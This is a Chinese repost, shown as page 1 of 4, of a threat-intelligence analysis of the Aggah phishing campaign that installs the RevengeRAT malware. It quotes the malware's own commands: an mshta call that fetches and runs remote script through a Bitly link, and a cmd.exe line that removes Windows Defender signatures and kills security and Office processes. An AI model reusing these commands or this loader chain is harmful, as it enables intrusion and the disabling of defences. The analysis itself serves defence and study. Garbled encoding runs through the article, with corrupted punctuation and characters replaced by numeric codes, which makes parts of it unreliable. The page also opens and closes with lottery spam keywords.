手机上怎么买彩票双色球 微信上有人推荐买彩票 能合买彩票的平台 夫妻买彩票狂中30亿 买彩票心态 买彩票就买大乐透开奖结果 哪个平台买彩票安全吗 买彩票有买一个号的吗 怎么看走势图买彩票 如何在电脑上买彩票 美国几岁可以买彩票? 福彩工作人员买彩票 彩客网买彩票 能在微信上买彩票吗 怎么买彩票容易中

利用钓鱼邮件传播RevengeRAT的Aggah行动

来源£º本站整理 作者£º佚名 时间£º2019-04-28 TAG£º 我要投稿

2019年3月£¬Unit 42开始着手研究一起主要针对中东国家的攻击行动¡£研究分析表明£¬此项行动可能只是一起更大规模攻击行动的前奏£¬其目标涉及美欧亚三大洲¡£
此次攻击行动主要通过鱼叉式网络钓鱼邮件进行传播的£¬邮件携带了一个附件£¬在用户打开后£¬附件会通过模板注入从远程服务器加载一个启用了宏的恶意文件£¬而此文件?#21482;?#25351;向BlogSpot来获取恶意脚本£¬并通过该脚本从Pastebin上下载最终?#34892;?#36127;载——RevengeRAT恶意软件¡£在研究过程中£¬我们发现了有好几类传播的文档£¬虽然内容可能有所出入£¬但都遵循相同的流程£¬最后都是在用户机器上安装了在Pastebin上托管的RevengeRAT£¬这表明威胁行为者在整个攻击活动中的TTP£¨战术¡¢技术和过程£©是不变的¡£
最初£¬我们推测此项行动可能与Gorgon组织有关£¬理由有两个£º一个是高水平的TTP£¬二是对RevengeRAT恶意软件的使用¡£但我们当前还无法获得一些更?#33539;?#24615;的指标与Gorgon组织相匹配£¬尚且无法将其归因于Gorgon组织¡£
于是我们决定将此项行动称为Aggah行动£¬“Aggah”这个名称来源于Pastebin上一个托管RevengeRAT payload的账户名£¬也是用于分割发送到RevengeRAT C2服务器的数据的分隔符¡£
传播过程
我们对Aggah行动的研究始于2019年3月27日获取的一封文件£¬此文件通过电邮的方式发送到了某个中东国家的组织机构手里¡£这封邮件冒充本国一家大型金融机构的身份£¬告知用户的“账户被锁定了”¡£最初£¬这封文件只出现在了一个国家£¬在教育¡¢?#25945;?营销和政府垂直部门的机构中出现比?#39318;?#39640;£¬而在四天后的3月31日£¬我们看到同样的邮件被发送到了第二个中东国家的某家金融机构¡£后?#27492;?#30528;时间的推移£¬更多踪迹逐渐浮出水面£¬此次行动不仅仅针对中东地区£¬美国¡¢?#20998;?#21644;亚洲的多个组织机构也同样出现了这份文件的身影£¬且攻击者针对的目标是教育¡¢?#25945;å¡?#25216;术¡¢零售¡¢制造¡¢州/地方政府¡¢?#39057;Ýz?#21307;?#39057;?#34892;业¡£由于文件在功能上是相似的£¬所以我们将描述之前分析的原始样本¡£
3月27日发送的电子邮件中附带一个Word文档£¬文件名为“Activity.doc”£¨SHA256£ºd7c92a8aa03478155de6813c35e84727ac9d383e27ba751d833e5efba3d77946£©£¬打开后会试图通过模板注入加载远程OLE文档£¬具体过程如下£º当打开“Activity.doc”时£¬会显示图1£¬诱导用户启用宏£¬启动条件必须是桌面版本的Microsoft Word£¬因为宏在Office 365的Word的联机版本中不起作用¡£“Activity.doc”文件本身不包含宏£¬但从远程服务器加载的OLE文包含了一个宏¡£

图1. Activity.doc中用于诱导用户启用宏的截图
Activity.doc分析
此文档使用模板注入来加载托管在远程服务器上的文件¡£图2显示了文档页脚的内容£¬它会从hxxps£º//static.wixstatic [.] com / ugd / 05e470_b104c366c1f7423293887062c7354db2.doc处加载远程OLE文档£º

图2.Activity.doc文档页脚£¬显示了远程OLE文件所在地
加载的OLE文件?#23548;?#19978;是一个RTF文件(SHA256: 5f762589cdb8955308db4bba140129f172bf2dbc1e979137b6cc7949f7b19e6f)£¬它使用一个经过混淆的宏加载嵌入的Excel文档£¬宏里包含了大量“垃圾”代码¡£这个宏的目的是通过“Shell”命令解码并执行下列URL内容:
mshta hxxp://www.bitly[.]com/SmexEaldos3
上面的命令使用了内置的“mshta”应用程序来下载URL所提供的内容£¬URL是用Bit.ly生成的短链接¡£由WildFire解析后£¬短链接会重定向到hxxps£º//bjm9.blogspot [.] com / p / si.html£¬如图3中HTTP响应的“Location”字段所示¡£

图3.短链接£¬指向Blogspot
图4展示了链?#21448;?#21521;的内容£¬一篇看起来有点奇怪的BlogSpot文章¡£

图4.bjm9.blogspot (.]com屏幕截图
通过分析博客上的代码£¬我们发现它?#23548;ÊÉ习?#21547;了一个JavaScript脚本£¬如图5所示¡£

图5.嵌入的JavaScript脚本
恶意脚本在植入系统后可执行多个活动¡£首先£¬它会试图通过删除签名集来阻止Microsoft Defender¡£该脚本还能杀死Defender进程以及一些Office应用程序的进程¡£所有这些都是使用以下命令行执行的:
cmd.exe /c cd “”%ProgramFiles%\Windows Defender”” & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & forfiles /c “”taskkill /f /im MSASCuiL.exe”” & forfiles /c “”taskkill /f /im MpCmdRun.exe”” & exit
接着该脚本会试图禁用Office产品中的安全机制£¬尤其是通过设置注册表项值来启用宏和禁用ProtectedView¡£启用Word¡¢PowerPoint和Excel中的宏的操作是通过将某些注册表项£¨见附?#36857;?#35774;置为值“1”来完成的¡£
禁用Word¡¢PowerPoint和Excel中的ProtectedView安全机制则是将另一些注册表项£¨见附?#36857;?#35774;置为“1”¡£
我们之前的博文中曾讲过Gorgon组织在Office中启用宏和禁用ProtectedView的技术£¬以及对注册表项顺序的修改¡£此外£¬此次行动中中止Windows Defender和Microsoft Office应用程序进程的策略也与Gorgon组织如出一辙£¬并且Gorgon在之前的攻击行动中也曾用bit.ly缩写URL的行为£¬虽然存在明显的技术重叠£¬但仍然缺乏具体的证据表明这次攻击活动与Gorgon有关¡£托管在Blogspot上的脚本主要执行三个活动£¬包括:

[1] [2] [3] [4]  下一页

¡¾声明¡¿:黑吧安全网(http://www.rliwo.live)登载此文出于传递更多信息之目的£¬并不代表本站赞同其观点和对其真实性负责£¬仅适于网络安全技术爱好者学习研究使用£¬学习中请遵循国家相关法律法规¡£如有问题请联系我们£¬联系邮箱[email protected]£¬我们会在最短的时间内进行处理¡£
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载
        ¹ºÂò²ÊƱȨÍþÍøÖ·
        手机上怎么买彩票双色球 微信上有人推荐买彩票 能合买彩票的平台 夫妻买彩票狂中30亿 买彩票心态 买彩票就买大乐透开奖结果 哪个平台买彩票安全吗 买彩票有买一个号的吗 怎么看走势图买彩票 如何在电脑上买彩票 美国几岁可以买彩票? 福彩工作人员买彩票 彩客网买彩票 能在微信上买彩票吗 怎么买彩票容易中